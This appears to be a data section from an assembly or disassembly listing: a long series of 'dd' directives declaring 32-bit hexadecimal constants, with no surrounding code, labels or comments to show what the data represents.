		dd 2CD22330h, 0BB89852Dh, 86175D44h, 0FC5044C1h, 0A0787141h
		dd 420A67C9h, 0F4602208h, 328B7049h, 0BF887C65h, 4823B1B2h
		dd 0C9107E0Bh, 47F0381Fh, 3EA19B9h, 48B073DFh, 0F3C36C57h
		dd 8A045C1Ch, 0BEA7CA79h, 15D6A57Ah, 43238802h,	26D19309h
		dd 0F33E6FECh, 0D9665E09h, 722F1955h, 0FFE40211h, 0A5E0F3D2h
		dd 18BE995Ch, 1EB06432h, 70B83EE8h, 0C0B37E92h,	64CCE53h
		dd 0EE8091C8h, 74812EA2h, 32840E63h, 28F90404h,	10064DC0h
		dd 8E2A0046h, 83AEB23Eh, 5A8E0D88h, 2042F3F8h, 0B4BF5006h
		dd 0E340C050h, 20BD9D83h, 66E5CA0Dh, 82607311h,	442098B1h
		dd 44D3A21Fh, 6244814h,	248B22D9h, 0F501B0h, 45314AE3h
		dd 50048864h, 5A12603Ah, 584A6E09h, 212CB025h, 1DE4A095h
		dd 0C7955D13h, 4125C495h, 10021Fh, 12A9814Fh, 84AA9604h
		dd 8AA57C00h, 0AA5F5F44h, 0E360F848h, 6C46C48Ah, 27F88AE6h
		dd 166507F0h, 580266DBh, 0B989BD53h, 8FF33B84h,	6A243E65h
		dd 1BFBD590h, 7FB860C5h, 0B401184Ah, 58982504h,	0C7F8828Ch
		dd 0CA42DBA4h, 1257BF71h, 86FFF491h, 0FE0FFB44h, 0F4895B90h
		dd 0A8D50CC2h, 2DE1F7ECh, 77E6782Fh, 550F8A4Ah,	0B5250972h
		dd 79464392h, 85101269h, 220B6Ch, 0B8810C6Dh, 0E026921h
		dd 0B943A87Eh, 2CAB8F27h
		dd 996FE42Dh, 1892226Ch, 0A6379A71h, 520C52B3h,	0CD8A0B4h
		dd 0EC83F7A9h, 614A862Ah, 0C7501473h, 340A5A74h, 0B1561710h
		dd 197124B3h, 425E5CD0h, 0FA25CF23h, 80BC011h, 118AFC4Ah
		dd 4946B0C0h, 91502527h, 2455CA38h, 4552218Ch, 552828A2h
		dd 52848824h, 28226245h, 9CF12455h, 2A034554h, 11AC424Ch
		dd 2AA43480h, 7035256Ch, 63C0E3CDh, 478CB4A4h, 979B86A4h
		dd 72AD28A2h, 0F9753F9Bh, 0D07E844Eh, 0A2866ABDh, 75772F87h
		dd 55F3FF77h, 5F1B1456h, 57D199ECh, 0FCEED731h,	4464809Dh
		dd 0EAD7B04Ch, 8546EF64h, 0EE90340Ah, 0D7E69D70h, 62003A7Dh
		dd 0E1F31D05h, 0F6B2B8AEh, 0E51FDC07h, 0AD59955Ah, 65ABD241h
		dd 3CE6F576h, 7D043759h, 0AA190BB0h, 8218E8FBh,	0A2759F8Eh
		dd 0C598DC37h, 0AA81FED5h, 218B5481h, 0E4AAE3F5h, 81AF81Eh
		dd 8A08F86Ch, 67F9AF86h, 8F0DC128h, 0F57907FCh,	28B33242h
		dd 0E08C1538h, 8D18FB19h, 4B55C3A3h, 885DCD1Ah,	73525158h
		dd 0E4D2192Dh, 0AF448A9Bh, 0A0A128D2h, 0FBF226E8h, 94674511h
		dd 0D0AC8A9Bh, 395EF477h, 0F482D661h, 0FC1635C7h, 0CBA795D9h
		dd 0AE9C4E19h, 2C9D5575h, 0DD1C8B5Ah, 1F415453h, 645B420Ch
		dd 0AC8249C3h, 0A0175930h, 0DE4F3C56h, 94E1BCC7h, 0EA5A9570h
		dd 3BE6813Ah, 125820F6h, 0F1A02906h, 0B48410BCh, 0F5E593B0h
		dd 67D95CBDh, 0AFF0DEFFh, 9DD45887h, 0FD165243h, 972F673Fh
		dd 63162021h, 0CE75D79h, 0E2CA5558h, 0AB2C2AF8h, 283AB01h
		dd 88647456h, 74ED42FEh, 5D5EEF8Dh, 0E9663EB1h,	9CCD5558h
		dd 0E9DB37DCh, 0A3C2438Ah, 0CB07C5BFh, 7B574203h, 35683DD2h
		dd 0D921648Ah, 0CA850225h, 2911570h, 84D3B706h,	0CE90E055h
		dd 0E8166D1Eh, 0C1616h,	0C7550925h, 92D1AABFh, 5001514Ah
		dd 0E0DF15DAh, 0C7172AC3h, 0F3006201h, 0C7ACC6DFh, 0EA007677h
		dd 0B97CDCE1h, 70AA69F7h, 91E54692h, 0A47FDBB2h, 9AE7D1D3h
		dd 9C04989h, 9A05D4EFh,	5A689DDAh, 3945A5F4h, 61694461h
		dd 3360B51Dh, 4B5EB84Ah, 0D12C9F84h, 21A224CFh,	0ABD5516h
		dd 0A3AEF801h, 0B2C57118h, 84C8A848h, 955F62EAh, 0CF2206F5h
		dd 698886A6h, 0FA56D83Bh, 0C58224E6h, 3953E50Dh, 87AF0145h
		dd 0FE35DCD3h, 0F836D568h, 6B2385B8h, 412C75Fh,	455EE1D3h
		dd 5D732591h, 8212C05Bh, 42B21A48h, 3AA78C4Bh, 147F9D8Ah
		dd 0FD74AB6Bh, 2ACAA8C0h, 84553EB0h, 0ED6EBDD7h, 1160542Fh
		dd 424E910h, 426829E4h,	9D85983Dh, 0A89EF3E3h, 380D9CAEh
		dd 0A2589B48h, 128912D4h, 0B1087E49h, 0F2246491h, 97FB910Bh
		dd 0B466AB74h, 5D4E58Ah, 268DAFD4h, 4ECA81E9h, 48346F29h
		dd 2C5A4A6Dh, 0E2CD750Eh, 0A574AA81h, 0F838D617h, 0E445B4AAh
		dd 205C8EEDh, 0C8A49579h, 2EBFF6A1h, 2FF317D2h,	412E3ABEh
		dd 0BF6483FDh, 6A5531Fh, 0E8AAC786h, 0D8BF792Bh, 0D1C8EC2Eh
		dd 210FAC92h, 0ECE0F8h,	560FB858h, 1E9F412Eh, 4781C403h
		dd 2C299C16h, 514BD58Bh, 57628A0Fh, 0A22CAFD9h,	0E2F045Ah
		dd 0B4CBAF9Ah, 4530402Fh, 8A28EC8Eh, 0C02329E4h, 0A66A9D28h
		dd 4E0013C0h, 2383009h,	0D00E56C8h, 722A82ABh, 0F407938Ah
		dd 0A22A0BD2h, 2F40D38Bh, 0CC233423h, 42C06933h, 3C3F8C89h
		dd 0F47777F0h, 168C0011h, 5D04FFDFh, 57A04EC2h,	0D813B905h
		dd 6C593EFAh, 49607C1Bh, 12A696F5h, 807708CEh, 0ED34155Eh
		dd 916B69A5h, 0D6DAD860h, 82DB01C4h, 31F6051h, 0FDF221C4h
		dd 5E80443Fh, 7593A09Eh, 91D549Ah, 0A45C4D86h, 0E807273Fh
		dd 0A11F1635h, 0B20049D4h, 46E1972h, 12C2EDB0h,	4B28895Fh
		dd 0AAF4258Ch, 2849969Ch, 19E402BFh, 612F9C00h,	0E805008Fh
		dd 4A256155h, 391C7C54h, 0A9C08B4h, 492F5DC4h, 0BB04EFE6h
		dd 0F8ACD091h, 0E87F06EBh, 30831D2Bh, 7F874467h, 45FCB2C7h
		dd 5F990A51h, 577668C7h, 3565009h, 0DEDFD915h, 4F5FD9DAh
		dd 0DEF26C59h, 1071145Bh, 45DC95DEh, 0DC535FA6h, 0D814D595h
		dd 5E5D69E1h, 8931EA02h, 12490A18h, 0D479B08h, 88144D79h
		dd 0B83B783Eh, 588AFFDBh, 51071905h, 29C21033h,	86FAF368h
		dd 0AC1280Dh, 36574A08h, 0C1950642h, 1102A3E0h,	2318809Ah
		dd 0BB95A95Dh, 79C2A812h, 6AF7807Ch, 48990B0h, 62C10182h
		dd 0B9C9A4B3h, 38A99460h, 62057191h, 3CE76F42h,	0B72DEBC4h
		dd 0CD4068C9h, 416EC3FFh, 69307977h, 5D4A87AEh,	77151718h
		dd 50E84871h, 848009C8h, 0AD51640Ah, 0D60E2E55h, 0A7AE4AF5h
		dd 0E35FBB79h, 0CAE80D3Bh, 0D4A04E62h, 0E521C1AAh, 4646CB6Ah
		dd 9758CA4Bh, 55B1A808h, 2B3F026h, 0CA903359h, 69718330h
		dd 0F4B75B54h, 0EB3FD499h, 6C4C22C5h, 0E0CA105h, 0EC0F31ABh
		dd 0ECAF81B9h, 57FAE5D4h, 36049EABh, 0BFD6BC11h, 1FB5AAF8h
		dd 6780FCFh, 285AFFE5h,	3904EB1h, 9684088Ch, 8BF97778h
		dd 0B1332E76h, 0A107AF40h, 0CA5C10FDh, 0E614A1C9h, 183EEAFAh
		dd 0B8153B3Ch, 7D0027Ah, 9FC62A59h, 432289E0h, 5E28C2A9h
		dd 1B2EBBF3h, 179E0734h, 66EFB0D9h, 9C18EC07h, 0FD2A1095h
		dd 5805D576h, 8BB80BD7h, 7E399203h, 566EC8C1h, 1469145h
		dd 6F32187Fh, 0C18810C4h, 0A19496A2h, 0F994C5E5h, 0D75A9501h
		dd 3C4BB023h, 3E18BDB4h, 33BDD096h, 0A7288AC3h,	843EF22Eh
		dd 0BEB019Fh, 0BA71EB8h, 69E3392h, 0CE4AEB15h, 0CB0A584Bh
		dd 0C7D7DC8Ah, 7C55DDCAh, 0DC535661h, 58646844h, 0CBD638F4h
		dd 4DFE0567h, 0EC6AB2B9h, 30952EB5h, 4081609h, 9341F20Eh
		dd 0C4EB14CFh, 7C9BA309h, 0DD2E86FAh, 0FD5F904Dh, 0DF2CCF16h
		dd 693EBFA9h, 0A84C1225h, 0D82187C3h, 59DE9A25h, 0B8B314Fh
		dd 2354882Eh, 0AAD77710h, 81018AACh, 9C0074A3h,	4B5D3971h
		dd 8BF10A48h, 0DB39CB5Eh, 1F856EC0h, 0B5366AF2h, 1BC3EB05h
		dd 3E6D1910h, 9AACCBE4h, 0FED4EBF0h, 2DA3008h, 6C13577Ah
		dd 0E08A3110h, 0F604C273h, 25555501h, 7F98655h,	1FC3BB4Fh
		dd 0B00CF6DCh, 0F84A5940h, 96330A42h, 0A08009C1h, 8AF5375Bh
		dd 2EACC819h, 0ED30DC9Ah, 41AECAE8h, 0A2A650CBh, 0BCE59304h
		dd 95DC6165h, 108AF8C5h, 1213D284h, 8A5C725h, 0D0DC7D50h
		dd 65FE0747h, 0EAF9EB03h, 4E877FF7h, 15A49251h,	0FC61BCD4h
		dd 319DA0F9h, 8C621492h, 5EB811C0h, 0C41CBF1Bh,	27609823h
		dd 71052839h, 0AACEE0ACh, 0E0800F99h, 97756BC1h, 70307C2Eh
		dd 0EABB28D4h, 7BBEB41Ah, 0AD7524A4h, 96AEE6h, 28AFB23Bh
		dd 0DB1B8C40h, 43014FD1h, 2544B1D2h, 0F93B420Ah, 18776082h
		dd 3409B464h, 0A3386842h, 908308F5h, 48B39E45h,	23C5A340h
		dd 6EAA24Eh, 202634Bh, 858D082Eh, 3855BAF2h, 75835558h
		dd 0AC1CD2F0h, 1753A8DCh, 28C05EF0h, 0C1618E90h, 8AAD1CFFh
		dd 17A40F0Eh, 7AC46D52h, 6005CF81h, 191C10A4h, 82AB2100h
		dd 0A8C50448h, 0A26762A5h, 64CCA0DAh, 70EA4CFBh, 0BF832FE3h
		dd 0E759D4E8h, 0BC0AACAEh, 6F05E09Dh, 3B5090FCh, 6139A027h
		dd 2A18DC13h, 4C6D8C5Dh, 41C6B7D3h, 0AB2A42EBh,	0BC48D1BFh
		dd 76F110Bh, 0D4C6081Ch, 5C9F1D65h, 0C175B26Ch,	72DCF9A6h
		dd 0E2C3CBEAh, 0AE85C021h, 0BF8BE038h, 0EB1F2A00h, 5B17428Dh
		dd 2B50FC1h, 0F2D707CDh, 55894E17h, 832E21A1h, 1BDA8243h
		dd 52A007C6h, 0BD2F32FEh, 80FFE838h, 8C64E552h,	17587589h
		dd 87FD19FFh, 982C37E3h, 0CCF07181h, 0CDBBE6D2h, 77484F20h
		dd 0C9214EFFh, 62893EFh
		dd 0C0524860h, 0A7C41047h, 0C02B3983h, 0B8B33FEAh, 78A06E6Dh
		dd 122CAC0h, 0C552572Bh, 0CAB4AE8Bh, 0FC8C48EAh, 550A5153h
		dd 4423556Ah, 0C00A892Bh, 258E14ABh, 0CB493BE8h, 4B267F86h
		dd 0AAD5578h, 38C9056Bh, 788D4C93h, 27627B83h, 35FA665Dh
		dd 21BF2334h, 5D8D0248h, 0A57395DAh, 10B53854h,	1DED662Ah
		dd 0EBCC276Ch, 5B176322h, 3E8F7F6Ch, 0CC194384h, 57EB1431h
		dd 31F08352h, 5380D859h, 83D2515Eh, 15048C2Bh, 4F6EBA85h
		dd 0E933A3BDh, 55DA028Ah, 2F8679EAh, 396870E4h,	0F46C8955h
		dd 1918C2Eh, 0AEF25220h, 6D8F45DFh, 5B85BA12h, 0E9F26260h
		dd 0B29F6BF9h, 38019808h, 250CFDC6h, 0BF3E9184h, 54F152CFh
		dd 0E62C8DE4h, 9FC66BF8h, 4E8D2B74h, 6C6BA1A1h,	0E24F6D7Fh
		dd 0CA35D44Fh, 7C9082A0h, 4F331C0Fh, 84B38103h,	68D7DD62h
		dd 5455E79Dh, 0ABEBA831h, 0CBAF7E9Ah, 2A8AAE33h, 0CCCC0A15h
		dd 8240BE8Dh, 5DD933FAh, 5B012217h, 2F6AFB95h, 0B2EF895Dh
		dd 3D55ADCCh, 561754A4h, 0A4CABA9Ch, 25D60C2Dh,	0ABE3FE68h
		dd 53409D53h, 0DA266798h, 0AEB8AEEh, 0BB99EDCCh, 0C4C120A9h
		dd 31B49959h, 9B0DD619h, 0A4836556h, 62301653h,	45FB5600h
		dd 0AAB90190h, 89D7649Fh, 0A413704Fh, 864080F0h, 0AB0B034Eh
		dd 0DD01A22Ah, 0E0109C0Ah, 0E91CF5BFh, 0ED3AC1BFh, 9A785D24h
		dd 0AEF890C1h, 1B32808Ch, 0B9DC6298h, 460689E7h, 186150Ch
		dd 0AC85E24Ch, 0A9681B08h, 0FA8EE5AAh, 0C77824E1h, 0DE9F1E9Fh
		dd 28276515h, 85672D5h,	0DBE420AFh, 0FC2AE52h, 0DA35EF8Fh
		dd 13352E3Dh, 222C04Bh,	22A6F463h, 94F14988h, 0C0BECDEBh
		dd 0E1FA803h, 6F068440h, 11018562h, 0C4245092h,	0F4940929h
		dd 62EC55Bh, 15CA3820h,	4ECD0782h, 0F384D3A7h, 0A8A239BEh
		dd 56F9A3FAh, 0E31B9D01h, 85270174h, 62FF5874h,	0F8BE6BDEh
		dd 54A48389h, 0BA934095h, 41F328DEh, 371B42A3h,	0B40BC3C5h
		dd 705F0CDAh, 0A0CD4070h, 20D0447Dh, 47973E37h,	30058D26h
		dd 1A17FE41h, 7846485h,	5EE5488Eh, 4E67D02Ch, 0D874D6A3h
		dd 0DEB8BE8Bh, 0A307874h, 0B2F8362Ch, 4BDF4819h, 0B42D08E1h
		dd 0E3AAADAAh, 51C50855h, 0C092AC89h, 117540DDh, 459656h
		dd 0F8EB85ACh, 8FA3688Fh, 8CB85D27h, 0A3F6C053h, 0A207AF79h
		dd 1260BFB4h, 220C345Eh, 8529E569h, 0D14B1898h,	0E74A873Ah
		dd 0A0AFC218h, 6505CEF5h, 0A1E69CAh, 0ADE528BEh, 64D60CAAh
		dd 7F3119BEh, 883C7E31h, 4A850A9Ah, 4C6F1979h, 4F5DABA7h
		dd 25180081h, 6D7ACB8Ch, 560F1C2Fh, 7C3AC0FBh, 0D38342B1h
		dd 552842EAh, 2E8F641Fh, 0C0A12389h, 64FE21A0h,	8B4DAB88h
		dd 157AAED3h, 6205161Ah, 0A02E1D04h, 72067544h,	16C2B0F0h
		dd 72E970C8h, 285B1A59h, 8F063769h, 69B3028Bh, 87E37906h
		dd 52EFF703h, 56022CE0h, 4C16E7C0h, 0C88A4A2Bh,	181015B1h
		dd 755DBE80h, 997118A0h, 55823247h, 0C1E25EE3h,	33E5C575h
		dd 0D69020BAh, 723D5D58h, 0FFD0CB15h, 7E2329A5h, 6A051D0Bh
		dd 0AE7E561Fh, 0B72350E3h, 2C571FE6h, 7FC18059h, 4C1C65C1h
		dd 1809B028h, 0C0317DC6h, 7A1A55EBh, 0EC2E238Ch, 7585500Eh
		dd 373EC249h, 0C07A3EE4h, 0D49C98E1h, 0C528906Ah, 474B1499h
		dd 0F1A8A507h, 6080CACh, 0A9939307h, 0A527655Dh, 9159507Dh
		dd 228B5507h, 28FC02C4h, 0B899FD7Dh, 22A2FF8h, 0F2AF5372h
		dd 0FE9AF81Ch, 0C17C5626h, 59DCEAE2h, 81478415h, 4EBBB89Ah
		dd 3140A421h, 8BDEE4B3h, 0B902BEB1h, 0B8D8BE4Ah, 381B7E60h
		dd 0F865E135h, 0A64E0D2h, 7BC2DF80h, 0FDE3C608h, 9D5FDCA6h
		dd 0C5C09A43h, 450258F0h, 5EB9FECDh, 0F1746439h, 70F66DEFh
		dd 9BE41FBDh, 737F83D2h, 792354E8h, 29ED535Fh, 1C574252h
		dd 6666546h, 0D3E8CCCBh, 84CA3C54h, 73EC4A5Dh, 0D099D3C2h
		dd 419EFBFEh, 582BBCAAh, 3CB04E96h, 2180CBEEh, 0E67D5AB5h
		dd 951EF0C0h, 9B53B2DFh, 720AC9FDh, 5670842h, 0C3828A53h
		dd 0D541D2BFh, 51504B0h, 9D5275E1h, 86EEDBEDh, 79300887h
		dd 0FD131381h, 0B83A7FC1h, 272F037Eh, 0E57BE03h, 6515FF5Fh
		dd 7FEE8F8h, 0AC245587h, 12DA55CBh, 58A642B8h, 0F9B9CBEFh
		dd 1667FF12h, 807A4156h, 8CB4A852h, 9CC228A8h, 0D9AD8CCAh
		dd 5A35DCF3h, 3DE46A8Ah, 0E2E60F4Fh, 13CC00CEh,	3875F287h
		dd 73791A69h, 0AA0BE561h, 33E90CD5h, 7B7897BDh,	0E2945097h
		dd 0DB825CC3h, 0F9CD8867h, 75880F92h, 6FFD5611h, 1451B825h
		dd 3BD16BFBh, 18C8E28Ah, 9D249755h, 0F15FA2AFh,	0F0DC3D86h
		dd 0CD4E2A87h, 0D7841D86h, 0E0817D1Bh, 4C5A6911h, 289C788Bh
		dd 0C1881C35h, 4A6AE013h, 141DC405h, 0DB17E8ABh, 9D4C5D9h
		dd 0D4AE2478h, 14961497h, 5C85D001h, 0A5579759h, 318F02Eh
		dd 854153EAh, 14C383FFh, 0A7EB9EC0h, 5E2E0087h,	145CA0A9h
		dd 6747E281h, 0E867CDC8h, 0FB10D3EAh, 0D7E964C5h, 0ACC6BE4Dh
		dd 7C0F7F9h, 103715B2h,	0F46E44D1h, 0D850E681h,	66050E9h
		dd 0C6EDDDE1h, 9A3E642h, 0D44101A7h, 0DF15ABDFh, 20CCE6D1h
		dd 0CB526BADh, 0A82E3DFFh, 2A84D502h, 0F23BA4FAh, 2FDCCCACh
		dd 1DD2E2ACh, 0F00D755Fh, 59236CBFh, 10B63775h,	2425A1F5h
		dd 181DDE3Bh, 0C3F7D3A8h, 4BC1933h, 70A8FE95h, 3414271h
		dd 3F527EDAh, 726EC497h, 0D5745DD8h, 0F70512A6h, 0B64120E2h
		dd 8964C1EDh, 386B83FDh, 69283822h, 25877CD2h, 41AEDCAAh
		dd 0C80A95FAh, 77D188DFh, 189D3D88h, 0A67D0F94h, 9033DE86h
		dd 0BAC0B57Eh, 50BA004Ah, 0C0478517h, 43B092A2h, 0BD2AB149h
		dd 0C0C2060Ah, 0BC006D2Bh, 1FC56EBBh, 7F39CD22h, 0DFCEFF06h
		dd 5FF9D4B9h, 28B3E9DCh, 2E3AC532h, 8B2FD2E9h, 0A1A5AFC4h
		dd 595FFC58h, 83A0FF8Bh, 8B98881Eh, 0FF15BFF3h,	0A225D645h
		dd 40AEF98Ch, 0DA168B6Dh, 945DD738h, 0C541369Bh, 22BB4574h
		dd 9208DFE9h, 4879EB6Dh, 29D5019Ch, 0C2EBDF84h,	252DA7AEh
		dd 9950290Ah, 4D827499h, 0ABC33029h, 0E2D0634Bh, 5105707h
		dd 0CA5CD0Bh, 20E88BA7h, 0E2A01C2Eh, 0EA60B5D7h, 871325CDh
		dd 22AB27E7h, 0ACC4C909h, 0BCECB545h, 510F14E1h, 7A0A0067h
		dd 0CE0BA018h, 92061384h, 0A43FFCC0h, 9F28019Eh, 6E267C62h
		dd 258F0832h, 0D2597F61h, 4571A989h, 703670F5h,	85636180h
		dd 8E801B34h, 8F136891h, 614E7A8Bh, 5AAC16A7h, 791CBFDCh
		dd 2C20CABDh, 38C955Dh,	24FC2946h, 65D63A35h, 14CF290Ah
		dd 154FC5FEh, 3F335DE3h, 3B2880E0h, 3389655Eh, 803F023h
		dd 0FC2EA2EFh, 743D218Bh, 6899A2B2h, 234C75B0h,	5CF9886h
		dd 112C9B60h, 280A5D28h, 5010974Ah, 9DA15A4Bh, 3642B796h
		dd 8B7A782Dh, 71F3B175h, 160BE5E2h, 59852D2Ah, 157742BAh
		dd 4207AD83h, 8042D10h,	48D3EB8Bh, 67E0500h, 62D40DE8h
		dd 19C0FD70h, 6AB2D328h, 0F5505F60h, 322B20EFh,	0AC8C051Fh
		dd 1498234Eh, 90C12CA8h, 8B2F3601h, 0FB42F020h,	0E308C0B9h
		dd 268AEBC8h, 0CA9D62FEh, 56864093h, 0B515D210h, 0CC0071Fh
		dd 0B07C0820h, 0CC5B5406h, 3C17B900h, 10589492h, 0C05249A8h
		dd 857BCB44h, 52B2F6A9h, 95551484h, 281DEF37h, 9297254Ah
		dd 9533F6D4h, 0B029D607h, 0A6F5EC58h, 0F2148114h, 902E174Eh
		dd 808EFD3h, 0D63E7061h, 55B725BCh, 180F0704h, 49E66944h
		dd 6AB2AC60h, 7D808121h, 2895627h, 36082C8Ah, 7BF47C74h
		dd 14070D56h, 329E005h
		dd 0A068236Dh, 0A84867Eh, 3D043632h, 5B841026h,	557ABFDCh
		dd 0FF020C4Eh, 870832AEh, 0D4F4125Ah, 0EBB0345Ah, 439197DEh
		dd 0DD618E23h, 1C62FC96h, 6A082F4Ch, 2BBA2668h,	3D3E807Bh
		dd 0F355C456h, 0D46F8D5Ch, 705CC0B9h, 6007A0F9h, 3A9CFFB7h
		dd 8E7A1EBAh, 501EE806h, 0DC0A148Ch, 220935E1h,	97DECF26h
		dd 0D07E0BC6h, 0CBDF5417h, 0F46DA1D4h, 0EBEB7B8Dh, 55A11130h
		dd 716B1CB4h, 0E5AEA654h, 32853C58h, 0C74FBAE4h, 288C301Bh
		dd 1676D88Eh, 2973E81Eh, 66B888E7h, 0E4535041h,	119C4331h
		dd 636161DDh, 0B33D5050h, 0E0E83CAEh, 0A3783F66h, 7FC635B2h
		dd 640D58A3h, 0F074B648h, 0FAE03D2Bh, 0B2FAFC5Fh, 6553098Fh
		dd 0D154DE49h, 0C45A010Bh, 0C01D633Ch, 4120DF4Eh, 6BD4A8C0h
		dd 93657656h, 6A4EFA41h, 75988C9h, 8D14E8A8h, 969DD471h
		dd 14372892h, 81471D67h, 0D6CA0590h, 6FD0AE1Ch,	79988A00h
		dd 0EAE864FCh, 0A1431F92h, 62827104h, 832D4F30h, 818D923h
		dd 804C14CAh, 47B1182Ah, 4029231Ch, 0A7034A8Dh,	8BF2390Dh
		dd 0A4D706FAh, 0C44EA401h, 8C9C38AFh, 0EE4B3EFCh, 0D5C7DB81h
		dd 5159A680h, 0FEBF1CA7h, 7A8FDE71h, 8BFF38D4h,	0DD423385h
		dd 728E3396h, 604A3748h, 0E3838E6Eh, 4E2526FCh,	920263E0h
		dd 0AC4C25D2h, 37C7973Bh, 1B0F1621h, 0C188C152h, 0EB31C75Dh
		dd 0D5E5D482h, 5A7442F6h, 3918A40Eh, 0E8A2AEFAh, 5D3FACD3h
		dd 0F50341E8h, 643613A5h, 0F57204CCh, 1C5DD0ACh, 2714F0BDh
		dd 70A977C0h, 0BF521813h, 0E2583102h, 0C1421848h, 7F7C8A2Eh
		dd 148C6CFFh, 362FA95Dh, 0B77D01Ch, 6927BB69h, 0F61A0DB8h
		dd 0DE43E97Fh, 6F4DC5D6h, 0ED960FBBh, 42949F49h, 58C06576h
		dd 503A0917h, 0B261A312h, 4730E53Eh, 1B5383F4h,	60125D8Dh
		dd 0CBA821AFh, 0C11E4FFFh, 43F83EC4h, 43E44085h, 0CEDA8012h
		dd 0A61973DAh, 0B9CA0EBFh, 0BEB685BFh, 13FB7FA9h, 41EC9EC8h
		dd 0C651DB76h, 39C78145h, 3EF739CAh, 36EE7C67h,	3D05583Eh
		dd 4CA6700Fh, 51DDE3F3h, 581215B8h, 0ABB7C15Ch,	22B4C04Fh
		dd 16E652DBh, 0F5D6E36h, 55E10CB2h, 51A7BF15h, 0AD2396B5h
		dd 0BA5192DBh, 0B01F09D2h, 89ED0FC3h, 0D1B99AE9h, 0F07D1A75h
		dd 0C226C10Eh, 42EF6021h, 19FF6CEFh, 6DBF2895h,	7717290Ah
		dd 0A2D4018h, 0F301CF51h, 0BF43C75Fh, 8C518ED5h, 5F2A0D08h
		dd 0CBA5E957h, 84A28894h, 4E70EB8Eh, 54AB8D00h,	2155262h
		dd 1A04C7D3h, 17717E51h, 0F178C861h, 1B163317h,	0CA4A542Eh
		dd 0D4ED2AA8h, 150DCDC7h, 0A4C99627h, 0C41EC832h, 0B18901F5h
		dd 98211C7Bh, 0BC6B7BBEh, 1FB1D80h, 8DD2B763h, 1582BC03h
		dd 0D4C18E04h, 1279D425h, 1E8D0FA9h, 0D0812029h, 0AB162C8Ah
		dd 0E0B75681h, 0EDCB80B9h, 0CF2FAF9Eh, 8895C42Dh, 0D530580Bh
		dd 76154D3Ah, 404AD83h,	90D3666Dh, 0A40879EEh, 0C04A96DFh
		dd 78450F0Ah, 0A8623255h, 29B40929h, 16EF5B0Fh,	0C9FD701Bh
		dd 0E54EC165h, 0FB28277Fh, 0E1D0B652h, 93858052h, 4CE3AC02h
		dd 84D99A39h, 45349174h, 45829FA6h, 71535B8Ch, 0AA0925C9h
		dd 304D99AEh, 42655E93h, 0B85AB599h, 0B8CED2FBh, 0C1E6E0FDh
		dd 8D649031h, 0E0333D9Ah, 495C5D29h, 2833702Fh,	5BEEE078h
		dd 0C4E26C3Ch, 0C62BAACDh, 0A4B11F8Dh, 0A4F8972Ch, 3E65CC3Bh
		dd 0F7A40F8h, 0A1E1D6F5h, 0D0E96Bh, 3960A6Dh, 0C5FC0673h
		dd 5058519Fh, 27EE3135h, 0AB4A9A89h, 6366AE89h,	0C370E956h
		dd 0C8DB8255h, 5F98AA4Ch, 7CA7EEDBh, 0D3D33F1Fh, 3687AE0Eh
		dd 0C0FED466h, 0C73D0CCh, 0E2E1111h, 0D28B965Eh, 21519056h
		dd 0CE294A1Bh, 0DAC745F4h, 7CAB52BCh, 7C2CA759h, 95A9DBD5h
		dd 0DCD345D4h, 7647BD05h, 40343A28h, 983750F1h,	0CAEB7052h
		dd 0C722DA62h, 691A1BF8h, 72379294h, 923368BDh,	0F9E0D242h
		dd 6DAF56E0h, 0B4A07EB9h, 67DBFE78h, 0F032233Eh, 2F596169h
		dd 1B7CC11Bh, 1B0FB093h, 0A9EB8FF4h, 3E724A8h, 4197C2B6h
		dd 0C68CDE03h, 9790F7C7h, 0FB71BBC9h, 5D648AA2h, 4E0B08A6h
		dd 23BBCB0Fh, 0A9418A64h, 97620C8Dh, 0CF90945Ch, 0B84F2407h
		dd 0ECC02628h, 0CA7F8DC0h, 0E8EB28BCh, 6A13A8A6h, 0EC1ADBC1h
		dd 7C313CACh, 0DBAD51E7h, 71EBFD06h, 0A3C07DBCh, 2739AC8Ch
		dd 2B54C84Ch, 51070125h, 0B14186C3h, 19BC6350h,	0C6A6B8ECh
		dd 0ED3406Dh, 85C3C6BFh, 42829288h, 1789EAD7h, 0F36FE045h
		dd 0DFDBADB9h, 0E84822A5h, 1F6CC809h, 68F02077h, 1FF06C16h
		dd 3588A871h, 8B26149Ch, 834595Dh, 0CE2EC934h, 4400694Dh
		dd 1219BC1Bh, 686EFE0Eh, 84FBC5DCh, 51772218h, 18AE188Dh
		dd 0B95CE72Ah, 0A467D5B2h, 0DC83473Fh, 67629420h, 880A51F0h
		dd 0BBC5F7CFh, 0D503C3CAh, 5571B556h, 0F2DB689Ah, 0EFF96A90h
		dd 6E0AE4C5h, 9ED48445h, 88081B83h, 12C01FA0h, 8EF33246h
		dd 0C0C6FEFFh, 0EDD06A4Fh, 0E28FD140h, 3DEC48EEh, 0B72A4A95h
		dd 30E0617Ch, 0BD9BAFABh, 0F2CD6E2Ah, 848DB2AAh, 478DBE98h
		dd 0DDC05AD4h, 0E831059Ah, 69359155h, 24255EB5h, 25FCA250h
		dd 42A1BF70h, 0A8BBC6h,	0E574EEFFh, 1A902260h, 6ED3EFD0h
		dd 0EFB9E56h, 3E33860Dh, 975FA770h, 4490559Bh, 7C8A898Bh
		dd 7EFE4565h, 0CB448861h, 687DAEE1h, 63ED5BD4h,	50D95EEh
		dd 13536890h, 74314EAAh, 0C114C6ABh, 89FA34FEh,	90402498h
		dd 0F1DAD110h, 494A46F3h, 7AE64024h, 0A2ED3A69h, 892D76AFh
		dd 0A791119Eh, 416ACF7Ch, 0CC8AFD42h, 32895F53h, 359B540Bh
		dd 0A1AAFF9Bh, 623A2E95h, 5D45A856h, 0FC140857h, 0E9150156h
		dd 0E8FA7B72h, 0B5A351DDh, 57B271A8h, 8A01F8AAh, 5EDFAF84h
		dd 2514565h, 97E7C7D5h,	8D59DD6Fh, 4544360Eh, 4CAA7403h
		dd 7808E018h, 0AE5A9BE7h, 3F04A04Eh, 405D8EFCh,	15E95816h
		dd 0E739FA7Bh, 8751F477h, 768CD529h, 975DA639h,	55580061h
		dd 5A09017Ch, 10979C7Ch, 0AC703AE8h, 0B4F54BFAh, 0FCC560AEh
		dd 924C53BFh, 48205020h, 38AA14F0h, 62FDEEA6h, 176BB4C0h
		dd 0B0121875h, 20D4AC51h, 203A10A4h, 461D4118h,	170E71CFh
		dd 8FAB61ABh, 6BD7FFD3h, 82938B88h, 7F2E135Fh, 5662C110h
		dd 470B4848h, 0FBC76FD0h, 2C614AFAh, 0A211ED1Ch, 56275765h
		dd 4BAE6AFFh, 5F227F0Ch, 0B9D61F95h, 0A0CBEDA5h, 354AFDA8h
